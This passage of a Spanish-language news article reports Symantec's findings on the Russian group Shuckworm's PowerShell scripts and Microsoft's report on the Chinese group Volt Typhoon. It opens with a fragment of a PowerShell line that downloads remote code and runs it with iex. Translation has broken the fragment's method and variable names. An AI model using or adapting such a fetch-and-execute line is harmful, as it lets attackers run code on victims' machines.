net.webclient);$faddr=»htt»+’ps://’+$addr+$gt;$text=$client.descargas
tring($faddr);iex $texto»

Más recientemente, Symantec ha observado que Shuckworm aprovecha más direcciones IP en sus scripts de PowerShell. Este es probablemente un intento de evadir algunos métodos de seguimiento empleados por los investigadores.

Shuckworm también continúa actualizando las técnicas de ofuscación utilizadas en sus scripts de PowerShell en un intento de evitar la detección, con hasta 25 nuevas variantes de los scripts del grupo observadas por mes entre enero y abril de 2023.

La publicación del jueves incluye direcciones IP, hash, nombres de archivos y otros indicadores de compromiso que las personas pueden usar para detectar si han sido atacados. La publicación también advierte que el grupo representa una amenaza que los objetivos deben tomar en serio.

“Esta actividad demuestra que el enfoque implacable de Shuckworm en Ucrania continúa”, escribieron. “Parece claro que los grupos de ataque respaldados por el estado-nación ruso continúan apuntando con láser a los objetivos ucranianos en un intento de encontrar datos que puedan ayudar a sus operaciones militares”.

Los piratas informáticos chinos respaldados por el estado han estado apuntando a la infraestructura crítica de los EE. UU. y podrían estar sentando las bases técnicas para la posible interrupción de las comunicaciones entre los EE. UU. y Asia durante futuras crisis, advirtió Microsoft.

Los objetivos incluyen sitios en Guam, donde Estados Unidos tiene una importante presencia militar, agregó la compañía.

Microsoft dijo en una publicación de blog el miércoles que el grupo de piratas informáticos patrocinado por el estado, al que llama Volt Typhoon, ha estado activo desde mediados de 2021.

Dijo que las organizaciones afectadas por la piratería, que busca acceso persistente, se encuentran en los sectores de comunicaciones, fabricación, servicios públicos, transporte, construcción, marítimo, tecnología de la información y educación.

Por separado, la Agencia de Seguridad Nacional, el FBI, la Agencia de Seguridad de Infraestructura y Ciberseguridad (CISA) y sus contrapartes de Australia, Nueva Zelanda, Canadá y Gran Bretaña -conocidos como los Cinco Ojos- publicaron un aviso conjunto compartiendo detalles técnicos sobre «el recientemente descubierto grupo de actividad».

El jueves, el gobierno chino respondió diciendo que las acusaciones “carecían de pruebas” y acusó a Estados Unidos de ser “el imperio de la piratería”.

“Está claro que esta es una campaña de desinformación colectiva de la coalición Five Eyes, lanzada por Estados Unidos por razones geopolíticas”, dijo a los periodistas el portavoz del Ministerio de Relaciones Exteriores de China, Mao Ning.

Un portavoz de Microsoft no quiso decir por qué el gigante del software estaba haciendo el anuncio ahora o si había visto recientemente un aumento en los ataques a la infraestructura crítica en Guam o en las instalaciones militares estadounidenses adyacentes allí, que incluyen una importante base aérea.

John Hultquist, analista jefe de la operación de inteligencia de seguridad cibernética Mandiant de Google, calificó el anuncio de Microsoft como «un hallazgo potencialmente muy importante».

“No vemos mucho de este tipo de investigación en China. Es raro”, dijo Hultquist.

La historia continúa

«Sabemos mucho sobre las capacidades cibernéticas de Rusia, Corea del Norte e Irán porque lo han hecho regularmente».

China generalmente se ha abstenido de usar los tipos de herramientas que podrían usarse para sembrar, no solo capacidades de recopilación de inteligencia, sino también malware para ataques disruptivos en un conflicto armado, agregó.

Microsoft dijo que la campaña de intrusión puso un «fuerte énfasis en el sigilo» y buscó mezclarse con la actividad normal de la red pirateando equipos de red de oficinas pequeñas, incluidos los enrutadores. Dijo que los intrusos obtuvieron acceso inicial a través de dispositivos Fortiguard orientados a Internet, que están diseñados para usar el aprendizaje automático para detectar malware.

“Durante años, China ha llevado a cabo operaciones cibernéticas agresivas para robar propiedad intelectual y datos confidenciales de organizaciones de todo el mundo”, dijo la directora de CISA, Jen Easterly, instando a la mitigación de las redes afectadas para evitar posibles interrupciones.

Bryan Vorndran, subdirector de la división cibernética del FBI, calificó las intrusiones como “tácticas inaceptables” en la misma declaración.

Las tensiones entre Washington y Beijing, que el establecimiento de seguridad nacional de EE. UU. considera su principal rival militar, económico y estratégico, han aumentado en los últimos meses.

Esas tensiones aumentaron el año pasado después de la visita de la entonces presidenta de la Cámara de Representantes, Nancy Pelosi, a Taiwán gobernado democráticamente, lo que llevó a China, que reclama la isla como su territorio, a lanzar ejercicios militares alrededor de Taiwán.

Las relaciones entre Estados Unidos y China se tensaron aún más a principios de este año después de que Estados Unidos derribara un globo espía chino que había cruzado los Estados Unidos.